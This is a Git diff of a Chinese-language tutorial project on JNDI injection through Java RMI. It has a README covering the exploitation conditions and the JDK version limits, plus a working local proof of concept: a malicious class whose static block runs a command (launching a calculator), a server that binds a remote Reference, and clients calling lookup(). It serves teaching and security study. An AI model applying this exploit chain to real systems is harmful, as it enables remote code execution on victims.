jndi 注入

Author: SummerSec

RMI JRMP JNDI/README.md

@@ -0,0 +1,127 @@
+## JNDI注入
+
+将恶意的Reference类绑定在RMI注册表中，其中恶意引用指向远程恶意的class文件，当用户在JNDI客户端的lookup()函数参数外部可控或Reference类构造方法的classFactoryLocation参数外部可控时，会使用户的JNDI客户端访问RMI注册表中绑定的恶意Reference类，从而加载远程服务器上的恶意class文件在客户端本地执行，最终实现JNDI注入攻击导致远程代码执行
+
+![image-20210427154417233](https://gitee.com/samny/images/raw/master/17u44er17ec/17u44er17ec.png)
+
+##### jndi注入的利用条件
+
+- 客户端的lookup()方法的参数可控
+- 服务端在使用Reference时，classFactoryLocation参数可控～
+
+上面两个都是在编写程序时可能存在的脆弱点（任意一个满足就行），除此之外，jdk版本在jndi注入中也起着至关重要的作用，而且不同的攻击响亮对jdk的版本要求也不一致，这里就全部列出来：
+
+
+- JDK 6u45、7u21之后：java.rmi.server.useCodebaseOnly的默认值被设置为true。当该值为true时，将禁用自动加载远程类文件，仅从CLASSPATH和当前JVM的java.rmi.server.codebase指定路径加载类文件。使用这个属性来防止客户端VM从其他Codebase地址上动态加载类，增加了RMI ClassLoader的安全性。
+
+ - JDK 6u141、7u131、8u121之后：增加了com.sun.jndi.rmi.object.trustURLCodebase选项，默认为false，禁止RMI和CORBA协议使用远程codebase的选项，因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞，但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。
+
+- JDK 6u211、7u201、8u191之后：增加了com.sun.jndi.ldap.object.trustURLCodebase选项，默认为false，禁止LDAP协议使用远程codebase的选项，把LDAP协议的攻击途径也给禁了。
+
+
+##### jndi注入 demo
+
+- 创建一个恶意对象
+
+```
+import javax.lang.model.element.Name;
+import javax.naming.Context;
+import java.io.BufferedInputStream;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.util.HashMap;
+
+public class EvilObj {
+    public static void exec(String cmd) throws IOException {
+        String sb = "";
+        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
+        BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
+        String lineStr;
+        while((lineStr = inBr.readLine()) != null){
+            sb += lineStr+"\n";
+
+        }
+        inBr.close();
+        inBr.close();
+    }
+
+    public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception{
+        return null;
+    }
+
+    static {
+        try{
+            exec("gnome-calculator");
+        }catch (Exception e){
+            e.printStackTrace();
+        }
+    }
+}
+```
+
+
+
+可以看到这里利用的是static代码块执行命令
+
+- 创建rmi服务端，绑定恶意的Reference到rmi注册表
+
+```java
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+public class Server {
+    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
+        Registry registry = LocateRegistry.createRegistry(1099);
+        String url = "http://127.0.0.1:6666/";
+        System.out.println("Create RMI registry on port 1099");
+        Reference reference = new Reference("EvilObj", "EvilObj", url);
+        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+        registry.bind("evil", referenceWrapper);
+    }
+
+}
+```
+
+- 创建一个客户端（受害者）
+
+```java
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+
+public class Client {
+    public static void main(String[] args) throws NamingException {
+        Context context = new InitialContext();
+        context.lookup("rmi://localhost:1099/evil");
+    }
+}
+```
+
+可以看到这里的lookup方法的参数是指向我设定的恶意rmi地址的。
+
+
+然后先编译该项目，生成class文件，然后在class文件目录下用python启动一个简单的HTTP Server:
+
+`python -m SimpleHTTPServer 6666`
+
+执行上述命令就会在6666端口、当前目录下运行一个HTTP  Server：
+
+![image-20210427154732163](https://gitee.com/samny/images/raw/master/32u47er32ec/32u47er32ec.png)
+
+然后运行Server端，启动rmi registry服务
+
+![](https://gitee.com/samny/images/raw/master/47u47er47ec/47u47er47ec.png)
+
+
+
+成功弹出计算器。注意,我这里用到的jdk版本为jdk7
+
+![image-20210427154801968](https://gitee.com/samny/images/raw/master/2u48er2ec/2u48er2ec.png)
+

RMI JRMP JNDI/RMI JRMP JNDI.iml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4" />

RMI JRMP JNDI/pom.xml

@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>RMI JRMP JNDI</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <configuration>
+                    <source>7</source>
+                    <target>7</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+
+
+</project>

RMI JRMP JNDI/src/main/java/summersec/jndi/Client.java

@@ -0,0 +1,21 @@
+package summersec.jndi;
+
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+/**
+ * @ClassName: Client
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/27 15:24
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class Client {
+
+    public static void main(String[] args) throws NamingException {
+        Context context = new InitialContext();
+        context.lookup("rmi://127.0.0.1:1099/evil");
+    }
+}

RMI JRMP JNDI/src/main/java/summersec/jndi/EvilObj.java

@@ -0,0 +1,48 @@
+//package summersec.jndi;
+
+import javax.naming.Context;
+import javax.lang.model.element.Name;
+import java.io.BufferedInputStream;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.util.HashMap;
+
+/**
+ * @ClassName: EvilObj
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/27 15:18
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class EvilObj {
+    public static void exec(String cmd) throws IOException {
+        String sb = "";
+        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
+        BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
+        String lineStr;
+        while((lineStr = inBr.readLine()) != null){
+            sb += lineStr+"\n";
+
+        }
+        inBr.close();
+        inBr.close();
+    }
+
+    public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception{
+        return null;
+    }
+
+    static {
+        try{
+            exec("calc");
+        }catch (Exception e){
+            e.printStackTrace();
+        }
+    }
+
+//    public static void main(String[] args) throws IOException {
+//        exec("calc");
+//    }
+}

RMI JRMP JNDI/src/main/java/summersec/jndi/Server.java

@@ -0,0 +1,31 @@
+package summersec.jndi;
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @ClassName: Server
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/27 15:23
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class Server {
+
+    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
+        Registry registry = LocateRegistry.createRegistry(1099);
+        String url = "http://127.0.0.1:6666/";
+        System.out.println("Create RMI registry on port 1099");
+        Reference reference = new Reference("EvilObj", "EvilObj", url);
+        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+        registry.bind("evil", referenceWrapper);
+    }
+
+}

RMI JRMP JNDI/src/main/java/summersec/rmi/AppA.java

@@ -0,0 +1,28 @@
+package summersec.rmi;
+
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @ClassName: App
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/25 16:19
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class AppA {
+    public static void main(String[] args) {
+
+        try {
+            Registry registry = LocateRegistry.createRegistry(1099 );
+            registry.bind("hello", new HelloServiceImpl());
+        } catch (RemoteException e) {
+            e.printStackTrace();
+        } catch (AlreadyBoundException e) {
+            e.printStackTrace();
+        }
+    }
+}

RMI JRMP JNDI/src/main/java/summersec/rmi/AppB.java

@@ -0,0 +1,28 @@
+package summersec.rmi;
+
+import java.rmi.NotBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @ClassName: AppB
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/25 16:50
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class AppB {
+    public static void main(String[] args) {
+        try {
+            Registry registry = LocateRegistry.getRegistry("127.0.0.1",1099);
+            HelloService helloService = (HelloService) registry.lookup("hello");
+            System.out.println(helloService.sayHello());
+        } catch (RemoteException e) {
+            e.printStackTrace();
+        } catch (NotBoundException e) {
+            e.printStackTrace();
+        }
+    }
+}

RMI JRMP JNDI/src/main/java/summersec/rmi/AppC.java

@@ -0,0 +1,36 @@
+package summersec.rmi;
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @ClassName: AppC
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/25 17:22
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class AppC {
+    public static void main(String[] args) {
+        try {
+            Registry registry = LocateRegistry.createRegistry(1099);
+
+            Reference reference = new Reference("calc","calc","http://127.0.0.1:80/");
+            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+            registry.bind("hello",referenceWrapper);
+        } catch (RemoteException e) {
+            e.printStackTrace();
+        } catch (NamingException e) {
+            e.printStackTrace();
+        } catch (AlreadyBoundException e) {
+            e.printStackTrace();
+        }
+    }
+}

RMI JRMP JNDI/src/main/java/summersec/rmi/AppD.java

@@ -0,0 +1,24 @@
+package summersec.rmi;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+
+/**
+ * @ClassName: AppD
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/4/25 17:26
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class AppD {
+    public static void main(String[] args) {
+
+        try {
+            Object context = new InitialContext().lookup("rmi://127.0.0.1:1099/hello");
+        } catch (NamingException e) {
+            e.printStackTrace();
+        }
+    }
+}